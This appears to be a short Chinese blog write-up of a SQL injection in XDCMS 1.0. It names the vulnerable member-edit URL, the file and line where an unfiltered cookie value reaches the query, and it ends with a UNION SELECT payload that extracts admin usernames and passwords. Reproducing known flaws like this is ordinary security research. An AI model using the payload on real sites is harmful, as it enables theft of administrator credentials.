XDCMS_1.0_sql注入漏洞(二)

# XDCMS 1.0 sql注入漏洞(二)

===========================

一、漏洞简介
————

二、漏洞影响
————

XDCMS 1.0

三、复现过程
————

漏洞存在于用户资料修改页面,URL:`index.php?m=member&f=edit`

![](/static/qingy/XDCMS_1.0_sql注入漏洞(二)/img/rId24.jpg)

漏洞文件位于`system/modules/member/index.php`,`line:178`

![](/static/qingy/XDCMS_1.0_sql注入漏洞(二)/img/rId25.jpg)

\$userid直接从Cookie中取出,并无任何过滤,导致注入

![](/static/qingy/XDCMS_1.0_sql注入漏洞(二)/img/rId26.jpg)

select * from table_member where ‘userid’=-4 Union seLect 1,2,username,4,5,6,7,8,9,10,11,12,password,14,15 fRom c_admin

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容